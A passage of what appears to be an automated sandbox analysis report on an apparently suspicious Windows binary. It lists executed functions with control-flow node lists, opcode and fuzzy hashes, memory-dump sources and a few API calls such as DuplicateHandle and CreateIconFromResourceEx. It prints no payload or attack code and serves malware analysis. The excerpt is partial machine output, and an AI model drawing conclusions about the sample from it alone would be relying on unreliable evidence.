276a3ac 24514->24522 24517->24511 24518 276be00 GetModuleHandleW 24520 276be2d 24518->24520 24519 276bbf4 24519->24517 24519->24518 24520->24511 24524 276bdb8 GetModuleHandleW 24522->24524 24525 276bbe4 24524->24525 24525->24517 24526 276be60 24525->24526 24527 276a3ac GetModuleHandleW 24526->24527 24528 276be74 24527->24528 24528->24519 24619 276de60 24620 276dea6 24619->24620 24623 276e448 24620->24623 24626 276e074 24623->24626 24627 276e4b0 DuplicateHandle 24626->24627 24628 276df93 24627->24628

                                                                                          Executed Functions

                                                                                          Function 058B12B0 Relevance: 6.9, Strings: 5, Instructions: 650COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 526 58b12b0-58b12d8 527 58b17bb-58b1824 526->527 528 58b12de-58b12e3 526->528 535 58b182b-58b18b3 527->535 528->527 529 58b12e9-58b1306 528->529 529->535 536 58b130c-58b1310 529->536 575 58b18be-58b193e 535->575 537 58b131f-58b1323 536->537 538 58b1312-58b131c 536->538 539 58b1332-58b1339 537->539 540 58b1325-58b132f 537->540 538->537 543 58b133f-58b136f 539->543 544 58b1454-58b1459 539->544 540->539 554 58b1b3e-58b1b52 543->554 558 58b1375-58b1448 543->558 548 58b145b-58b145f 544->548 549 58b1461-58b1466 544->549 548->549 551 58b1468-58b146c 548->551 552 58b1478-58b14a8 549->552 551->554 555 58b1472-58b1475 551->555 552->575 576 58b14ae-58b14b1 552->576 564 58b1b58-58b1bbe 554->564 565 58b1b54-58b1b56 554->565 555->552 558->544 585 58b144a 558->585 572 58b1bc0-58b1bc6 564->572 573 58b1bc7-58b1be4 564->573 565->564 572->573 593 58b1945-58b19c7 575->593 576->575 578 58b14b7-58b14b9 576->578 578->575 583 58b14bf-58b14f4 578->583 592 58b14fa-58b1503 583->592 583->593 585->544 594 58b1509-58b1563 call 58b0ea0 * 2 592->594 595 58b1666-58b166a 592->595 597 58b19cf-58b1a51 593->597 638 58b1575 594->638 639 58b1565-58b156e 594->639 595->597 598 58b1670-58b1674 595->598 602 58b1a59-58b1a86 597->602 601 58b167a-58b1680 598->601 598->602 604 58b1682 601->604 605 58b1684-58b16b9 601->605 614 58b1a8d-58b1b0d 602->614 609 58b16c0-58b16c6 604->609 605->609 609->614 615 58b16cc-58b16d4 609->615 674 58b1b14-58b1b36 614->674 620 58b16db-58b16dd 615->620 621 58b16d6-58b16da 615->621 627 58b173f-58b1745 620->627 628 58b16df-58b1703 620->628 621->620 632 58b1747-58b1762 627->632 633 58b1764-58b1792 627->633 658 58b170c-58b1710 628->658 659 58b1705-58b170a 628->659 652 58b179a-58b17a6 632->652 633->652 644 58b1579-58b157b 638->644 639->644 645 58b1570-58b1573 639->645 653 58b157d 644->653 654 58b1582-58b1586 644->654 645->644 673 58b17ac-58b17b8 652->673 652->674 653->654 656 58b1588-58b158f 654->656 657 58b1594-58b159a 654->657 663 58b1631-58b1635 656->663 660 58b159c-58b15a2 657->660 661 58b15a4-58b15a9 657->661 658->554 665 58b1716-58b1719 658->665 664 58b171c-58b172d 659->664 669 58b15af-58b15b5 660->669 661->669 671 58b1637-58b1651 663->671 672 58b1654-58b1660 663->672 708 58b172f call 58b1c78 664->708 709 58b172f call 58b1c77 664->709 665->664 677 58b15bb-58b15c0 669->677 678 58b15b7-58b15b9 669->678 671->672 672->594 672->595 674->554 683 58b15c2-58b15d4 677->683 678->683 679 58b1735-58b173d 679->652 689 58b15de-58b15e3 683->689 690 58b15d6-58b15dc 683->690 691 58b15e9-58b15f0 689->691 690->691 696 58b15f2-58b15f4 691->696 697 58b15f6 691->697 698 58b15fb-58b1606 696->698 697->698 700 58b162a 698->700 701 58b1608-58b160b 698->701 700->663 701->663 703 58b160d-58b1613 701->703 704 58b161a-58b1623 703->704 705 58b1615-58b1618 703->705 704->663 707 58b1625-58b1628 704->707 705->700 705->704 707->663 707->700 708->679 709->679
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1718738221.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_58b0000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: Hoq$Hoq$Hoq$Hoq$Hoq
                                                                                          • API String ID: 0-1079488684
                                                                                          • Opcode ID: 902c19787d6a949a36473e1e0d33b70e7b7550f3859a3c9ecb75e8e5f2e6cfe1
                                                                                          • Instruction ID: 445acbac42fa19948111d2757c06ba1c442eb2e6abe8c12bed0365f09125f420
                                                                                          • Opcode Fuzzy Hash: 902c19787d6a949a36473e1e0d33b70e7b7550f3859a3c9ecb75e8e5f2e6cfe1
                                                                                          • Instruction Fuzzy Hash: 1E427E70A002188FEB54DF68C85479EBBF6BF84300F1485AAD40AEB395DB74AD85CF95
                                                                                          Function 027640F0 Relevance: 1.9, Strings: 1, Instructions: 675COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1714265164.0000000002760000.00000040.00000800.00020000.00000000.sdmp, Offset: 02760000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2760000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: d
                                                                                          • API String ID: 0-2564639436
                                                                                          • Opcode ID: 76e1264ea13c8210a809d0c7d84fb7cdd60b6b71f10cab87e04f58b1ac9a1d1d
                                                                                          • Instruction ID: 4bdff14910557cb9f4e89aaae120dd2473336a3c727641096a64d15d6afe502c
                                                                                          • Opcode Fuzzy Hash: 76e1264ea13c8210a809d0c7d84fb7cdd60b6b71f10cab87e04f58b1ac9a1d1d
                                                                                          • Instruction Fuzzy Hash: EE72D074E01228CFDB65EF65C948AEDBBB2EF48300F5184E9D449B6264DB359EA1CF40
                                                                                          Function 02765670 Relevance: 1.8, Strings: 1, Instructions: 535COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 1016 2765670-27656ab 1017 27656b2-276571a call 2765314 call 2765324 1016->1017 1018 27656ad 1016->1018 1022 276571f-27657f7 call 2760160 * 3 1017->1022 1018->1017 1035 27657ff-276580b 1022->1035 1036 2765813-276591d call 2765334 call 2765344 call 2765354 1035->1036 1048 276596f-27659e3 1036->1048 1049 276591f-2765969 1036->1049 1056 2765a35-2765aa9 1048->1056 1057 27659e5-2765a2f 1048->1057 1049->1048 1064 2765afb-2765b6f 1056->1064 1065 2765aab-2765af5 1056->1065 1057->1056 1072 2765bc1-2765ee1 call 2765364 call 2765374 call 2765364 call 2765374 call 2765364 call 2765374 call 2765364 call 2765374 1064->1072 1073 2765b71-2765bbb 1064->1073 1065->1064 1113 2765ff3-2766000 1072->1113 1073->1072 1114 2766006-2766008 1113->1114 1115 2766002 1113->1115 1118 276600f-2766016 1114->1118 1116 2766004 1115->1116 1117 276600a 1115->1117 1116->1114 1117->1118 1119 2765ee6-2765fef call 2765364 call 2765374 1118->1119 1120 276601c-2766024 1118->1120 1119->1113 1121 2766157-2766164 1120->1121 1122 2766166 1121->1122 1123 276616a-276616c 1121->1123 1125 276616e 1122->1125 1126 2766168 1122->1126 1127 2766173-276617a 1123->1127 1125->1127 1126->1123 1128 2766180-276620e call 2765384 call 2765334 call 2765344 call 2765394 call 27653a4 1127->1128 1129 2766029-2766153 call 2765364 call 2765374 1127->1129 1129->1121
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1714265164.0000000002760000.00000040.00000800.00020000.00000000.sdmp, Offset: 02760000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2760000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: d
                                                                                          • API String ID: 0-2564639436
                                                                                          • Opcode ID: b9f71cb6c13d3fd73bc688ed8c9c4588e6f977a570a235d9f337a2fa93cdc0d1
                                                                                          • Instruction ID: 226da41d958f174c607ab39fb1e3129eb1c38c2d984746c84da7a514f9c57f75
                                                                                          • Opcode Fuzzy Hash: b9f71cb6c13d3fd73bc688ed8c9c4588e6f977a570a235d9f337a2fa93cdc0d1
                                                                                          • Instruction Fuzzy Hash: D042BC74E01228DFDB65EF64C988AEDBBB2EF49304F5080E9D449A7264DB359E91CF40
                                                                                          Function 058B7E40 Relevance: .5, Instructions: 506COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1718738221.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_58b0000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: b051b9443ac2693362ec59a310bb63eed2111b30ee76ce54c847c641fae98c1f
                                                                                          • Instruction ID: 24c99a4c601d6e4778e95476b4ee2b6e98746acad002207f9d2d2664ae36e2d2
                                                                                          • Opcode Fuzzy Hash: b051b9443ac2693362ec59a310bb63eed2111b30ee76ce54c847c641fae98c1f
                                                                                          • Instruction Fuzzy Hash: 4A427178E11219CFDB54CFA9C984B9DBBB6BF48310F1481A9E809A7355DB34AE81CF50
                                                                                          Function 058B6B70 Relevance: .5, Instructions: 482COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1718738221.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_58b0000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: fbfe98f1398d7f1f66bf8b304190ee2dba741cde46a6cd0fd13481965594b145
                                                                                          • Instruction ID: 5df71da715cd3dfdf3f44a1a1ce4be7956290e3ad26cb7edbffa854b928a7dd9
                                                                                          • Opcode Fuzzy Hash: fbfe98f1398d7f1f66bf8b304190ee2dba741cde46a6cd0fd13481965594b145
                                                                                          • Instruction Fuzzy Hash: 7432A170A01219CFEB50DFAAC584A8EFBB6BF48311F55D195E448AB212DB30ED85CF64
                                                                                          Function 058B12A0 Relevance: .3, Instructions: 283COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1718738221.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_58b0000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: b0c6c95de51eea282d82a874361061bfdffb8b2f2acc5bbd32f9618aa831dcd7
                                                                                          • Instruction ID: 094d1f44b77e98d5202e62e45c70cf298020959a4a2e54719b9a440a223ff18e
                                                                                          • Opcode Fuzzy Hash: b0c6c95de51eea282d82a874361061bfdffb8b2f2acc5bbd32f9618aa831dcd7
                                                                                          • Instruction Fuzzy Hash: 7FC16A30E002188FEB15CFA5C8947DEBBB6BF88304F14C5AAD809AF355DB74A985CB50
                                                                                          Function 058B7E31 Relevance: .1, Instructions: 147COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1718738221.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_58b0000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: bf625f16b92722d1eb2fd38a3e5c2304d5af3b4cb2af5a8e07996e3b5b8680f8
                                                                                          • Instruction ID: 2fcb03f6d664ac74a7035cff40c1175b7f28134d29463103338ae71918b71a10
                                                                                          • Opcode Fuzzy Hash: bf625f16b92722d1eb2fd38a3e5c2304d5af3b4cb2af5a8e07996e3b5b8680f8
                                                                                          • Instruction Fuzzy Hash: D261B575E01218DBEB18CFAAD985BDDBBB6BF88300F1481A9E809A7354DB359941CF50
                                                                                          Function 058BAE38 Relevance: .1, Instructions: 140COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1718738221.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_58b0000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 129298c45405b8e8d971cc64f6b95142ccfac92aa09b5563f3b4dbe858ed52c0
                                                                                          • Instruction ID: 16d15e375b0838f449eeb7cda74de7393235365bff71f027981b065dc14e5faa
                                                                                          • Opcode Fuzzy Hash: 129298c45405b8e8d971cc64f6b95142ccfac92aa09b5563f3b4dbe858ed52c0
                                                                                          • Instruction Fuzzy Hash: 04518475D012199FDB08DFEAC9456EEFBF6BF88300F10802AE819AB254DB745946CF50
                                                                                          Function 027652E7 Relevance: .1, Instructions: 117COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1714265164.0000000002760000.00000040.00000800.00020000.00000000.sdmp, Offset: 02760000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2760000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: f6f1aa423ce6a867e5ad94f8f3e183baf2995550cadea261f479bc1e59e171ca
                                                                                          • Instruction ID: f1c0ad4c5af22d85f2805a7f320c280639eff2cac3501d61eb7260a31c10ee55
                                                                                          • Opcode Fuzzy Hash: f6f1aa423ce6a867e5ad94f8f3e183baf2995550cadea261f479bc1e59e171ca
                                                                                          • Instruction Fuzzy Hash: 314177311053018BDB419F38C850296FBE2FF46318B1886BAC849CB3A6EB74E849C780
                                                                                          Function 058B6B61 Relevance: .1, Instructions: 105COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1718738221.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_58b0000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: cdc8b2256a8b88b1cafc545e649b041f1475944e62bf4cf70ecdb2bf6290752a
                                                                                          • Instruction ID: 09567797932ff47c5f333311ed04d2f74326ce218e97cb826e144f4c0c159b74
                                                                                          • Opcode Fuzzy Hash: cdc8b2256a8b88b1cafc545e649b041f1475944e62bf4cf70ecdb2bf6290752a
                                                                                          • Instruction Fuzzy Hash: 8741E6B1E006188FEB58CFAAC9517DEBBF6BFC8300F14C0A9D41DA6255EB341A858F51
                                                                                          Function 058BAE28 Relevance: .1, Instructions: 102COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1718738221.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_58b0000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: cdfd199a65a7cbb44b538c505684e6707435c0424b6c5b224ead5adcc84c1c94
                                                                                          • Instruction ID: f124b681ccc3e08e4c48af0fbf8c1273b8a611df4694eb86568dd75564f75ed0
                                                                                          • Opcode Fuzzy Hash: cdfd199a65a7cbb44b538c505684e6707435c0424b6c5b224ead5adcc84c1c94
                                                                                          • Instruction Fuzzy Hash: 434194B5E006199FDB08CFAAD9456EEBBF6AF88310F14C02AE419AB254DB345946CF40
                                                                                          Function 058B6B31 Relevance: .1, Instructions: 98COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1718738221.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_58b0000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 0bb8c53f62dea70b5f8e611726427bcb2d2181fffce009e0fd3599bdf977a151
                                                                                          • Instruction ID: ce86ca6f5642047256c8e88f49c87f8ed843e60b92ffb14a5c0f19aa31d47e50
                                                                                          • Opcode Fuzzy Hash: 0bb8c53f62dea70b5f8e611726427bcb2d2181fffce009e0fd3599bdf977a151
                                                                                          • Instruction Fuzzy Hash: F541F9B1E006188FEB18CF6AC9507DEBBF2BF88300F14C0AAD51DA7255EB305A858F51
                                                                                          Function 0276BBC8 Relevance: 1.7, APIs: 1, Instructions: 200COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 1153 276bbc8-276bbd7 1154 276bc03-276bc07 1153->1154 1155 276bbd9-276bbe6 call 276a3ac 1153->1155 1156 276bc1b-276bc5c 1154->1156 1157 276bc09-276bc13 1154->1157 1162 276bbfc 1155->1162 1163 276bbe8-276bbf6 call 276be60 1155->1163 1164 276bc5e-276bc66 1156->1164 1165 276bc69-276bc77 1156->1165 1157->1156 1162->1154 1163->1162 1169 276bd38-276bd63 1163->1169 1164->1165 1167 276bc9b-276bc9d 1165->1167 1168 276bc79-276bc7e 1165->1168 1170 276bca0-276bca7 1167->1170 1171 276bc80-276bc87 call 276aebc 1168->1171 1172 276bc89 1168->1172 1192 276bd66-276bdb0 1169->1192 1174 276bcb4-276bcbb 1170->1174 1175 276bca9-276bcb1 1170->1175 1173 276bc8b-276bc99 1171->1173 1172->1173 1173->1170 1177 276bcbd-276bcc5 1174->1177 1178 276bcc8-276bcd1 call 276aecc 1174->1178 1175->1174 1177->1178 1184 276bcd3-276bcdb 1178->1184 1185 276bcde-276bce3 1178->1185 1184->1185 1186 276bce5-276bcec 1185->1186 1187 276bd01-276bd0e 1185->1187 1186->1187 1189 276bcee-276bcfe call 276aedc call 276aeec 1186->1189 1193 276bd10-276bd2e 1187->1193 1194 276bd31-276bd37 1187->1194 1189->1187 1203 276bdb2-276bdf8 1192->1203 1193->1194 1204 276be00-276be2b GetModuleHandleW 1203->1204 1205 276bdfa-276bdfd 1203->1205 1206 276be34-276be48 1204->1206 1207 276be2d-276be33 1204->1207 1205->1204 1207->1206
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1714265164.0000000002760000.00000040.00000800.00020000.00000000.sdmp, Offset: 02760000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2760000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Similarity
                                                                                          • API ID: HandleModule
                                                                                          • String ID:
                                                                                          • API String ID: 4139908857-0
                                                                                          • Opcode ID: bcac6758c5ae0ab65bb0bfe771f351c58a31d7c3152dbd88ce276a92bce55495
                                                                                          • Instruction ID: 0ed0ee2819abc5b5c8aa5e9810bf5a9d9ea410d6d8fff5f7e7deddda5489b913
                                                                                          • Opcode Fuzzy Hash: bcac6758c5ae0ab65bb0bfe771f351c58a31d7c3152dbd88ce276a92bce55495
                                                                                          • Instruction Fuzzy Hash: DC814870A00B059FD724DF29D04976ABBF2FF89308F00892DD48AE7A50DB75E946CB94
                                                                                          Function 058B1C78 Relevance: 1.6, APIs: 1, Instructions: 85COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 1210 58b1c78-58b1c9d call 58b0ebc 1213 58b1c9f-58b1caf 1210->1213 1214 58b1cb2-58b1cc2 1210->1214 1217 58b1cc8-58b1d44 CreateIconFromResourceEx 1214->1217 1218 58b1cc4 1214->1218 1219 58b1d4d-58b1d6a 1217->1219 1220 58b1d46-58b1d4c 1217->1220 1218->1217 1220->1219
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1718738221.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_58b0000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Similarity
                                                                                          • API ID: CreateFromIconResource
                                                                                          • String ID:
                                                                                          • API String ID: 3668623891-0
                                                                                          • Opcode ID: a9923d159f6bc4d811ad60890998bbecd6524a838a8006d281d0f7d09f89559f
                                                                                          • Instruction ID: 40fec4cf00f54a363f4c7af9b2bc3a7441982d42a7dfd990a6b8500e6acb93c8
                                                                                          • Opcode Fuzzy Hash: a9923d159f6bc4d811ad60890998bbecd6524a838a8006d281d0f7d09f89559f
                                                                                          • Instruction Fuzzy Hash: 8731A9729043889FDB01CFA9C804AEEBFF8EF09310F14805AE954EB221C335A951CFA0
                                                                                          Function 0276E074 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 1223 276e074-276e544 DuplicateHandle 1225 276e546-276e54c 1223->1225 1226 276e54d-276e56a 1223->1226 1225->1226
                                                                                          APIs
                                                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0276E476,?,?,?,?,?), ref: 0276E537
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1714265164.0000000002760000.00000040.00000800.00020000.00000000.sdmp, Offset: 02760000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2760000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Similarity
                                                                                          • API ID: DuplicateHandle
                                                                                          • String ID:
                                                                                          • API String ID: 3793708945-0
                                                                                          • Opcode ID: 0f6961ce40f0722614bc664776615e7777377503b0b0b584ee504db26257217c
                                                                                          • Instruction ID: eacfbf68cacbea56a62bf3589b404ab7879901f3cff4d4049b66cb2932632a24
                                                                                          • Opcode Fuzzy Hash: 0f6961ce40f0722614bc664776615e7777377503b0b0b584ee504db26257217c
                                                                                          • Instruction Fuzzy Hash: 542103B5900218DFDB10CFAAD984AEEBFF4EB48314F14841AE914A7310D378A940CFA4
                                                                                          Function 058B0EBC Relevance: 1.6, APIs: 1, Instructions: 56windowCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 1229 58b0ebc-58b1d44 CreateIconFromResourceEx 1231 58b1d4d-58b1d6a 1229->1231 1232 58b1d46-58b1d4c 1229->1232 1232->1231
                                                                                          APIs
                                                                                          • CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?,?,?,?,058B1C92,?,?,?,?,?), ref: 058B1D37
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1718738221.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_58b0000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Similarity
                                                                                          • API ID: CreateFromIconResource
                                                                                          • String ID:
                                                                                          • API String ID: 3668623891-0
                                                                                          • Opcode ID: 5adb3ebb52923454534abed37bfad17e2b5143e3e218c6811dabdae611454471
                                                                                          • Instruction ID: 6f2f4616f8dcb44cef759f9c4497a22b1979095142febfb502a04fc595f3b526
                                                                                          • Opcode Fuzzy Hash: 5adb3ebb52923454534abed37bfad17e2b5143e3e218c6811dabdae611454471
                                                                                          • Instruction Fuzzy Hash: D7113AB5800259DFEB10CF9AD844BEEBFF8EB48310F14841AE954A7350C375A954CFA4
                                                                                          Function 0276A6B8 Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • KiUserCallbackDispatcher.NTDLL(0000004B), ref: 0276A72D
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1714265164.0000000002760000.00000040.00000800.00020000.00000000.sdmp, Offset: 02760000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2760000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Similarity
                                                                                          • API ID: CallbackDispatcherUser
                                                                                          • String ID:
                                                                                          • API String ID: 2492992576-0
                                                                                          • Opcode ID: 12e24eea4bef952a56c3158d0881445477e00e4cd27e7a140ad62cfe9f672432
                                                                                          • Instruction ID: f58c0d62e490f303d9ce1411174e4d10beb841bb9dc5bfa7e6b7719c74b43eb7
                                                                                          • Opcode Fuzzy Hash: 12e24eea4bef952a56c3158d0881445477e00e4cd27e7a140ad62cfe9f672432
                                                                                          • Instruction Fuzzy Hash: 7811A9B5804389DEDB11DF95D5083EEBFF4EB09314F1480A9D888B7242C3799A85CBA5
                                                                                          Function 0276A3AC Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetModuleHandleW.KERNELBASE(00000000,?,?,?,?,?,?,?,0276BBE4), ref: 0276BE1E
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1714265164.0000000002760000.00000040.00000800.00020000.00000000.sdmp, Offset: 02760000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2760000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Similarity
                                                                                          • API ID: HandleModule
                                                                                          • String ID:
                                                                                          • API String ID: 4139908857-0
                                                                                          • Opcode ID: 5e7bdcdcb281f90d35dd45cf57b508479ec2df4cc62203c65a63dfbcac003088
                                                                                          • Instruction ID: 2bfd833d9d89784cab8296c598b8964fd098e3fbbe4a38fb0ef0aa0509753f1b
                                                                                          • Opcode Fuzzy Hash: 5e7bdcdcb281f90d35dd45cf57b508479ec2df4cc62203c65a63dfbcac003088
                                                                                          • Instruction Fuzzy Hash: C71132B5C002498FDB10CF9AC448AEEFBF4EF49318F10842AD918B7210C375A545CFA4
                                                                                          Function 0276A6C8 Relevance: 1.5, APIs: 1, Instructions: 49COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • KiUserCallbackDispatcher.NTDLL(0000004B), ref: 0276A72D
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1714265164.0000000002760000.00000040.00000800.00020000.00000000.sdmp, Offset: 02760000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2760000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Similarity
                                                                                          • API ID: CallbackDispatcherUser
                                                                                          • String ID:
                                                                                          • API String ID: 2492992576-0
                                                                                          • Opcode ID: d41944bccd0bc4b97c55e42b7d6c95a87d0d3cb7860aadac8254bb5e0d9266b6
                                                                                          • Instruction ID: 546dcf769966974ce47857917353debd2982980304f447f0fc5f42f124d4de4b
                                                                                          • Opcode Fuzzy Hash: d41944bccd0bc4b97c55e42b7d6c95a87d0d3cb7860aadac8254bb5e0d9266b6
                                                                                          • Instruction Fuzzy Hash: CF11B2B5804389DEDB10DF55D5043EEBFF4EB05314F144099D488B7242C3799A44CBA5
                                                                                          Function 00B6D4A0 Relevance: .1, Instructions: 75COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1713719831.0000000000B6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B6D000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_b6d000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 2dceb3bb8b948eb520fc096017414dd169bdf3a3ffe32d1833e9ea5e785df377
                                                                                          • Instruction ID: 6e968b44159303f84beee486842480a612fc0a02ddc019aa4306b36e4a9d235e
                                                                                          • Opcode Fuzzy Hash: 2dceb3bb8b948eb520fc096017414dd169bdf3a3ffe32d1833e9ea5e785df377
                                                                                          • Instruction Fuzzy Hash: 0C213A71A04200DFDB15DF14D9C0B27BFA5FBA4318F20C1A9D90A4B656C33AD855CBA2
                                                                                          Function 00F0D1D4 Relevance: .1, Instructions: 72COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1713995482.0000000000F0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F0D000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_f0d000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Similarity
                                                                                          • API ID:
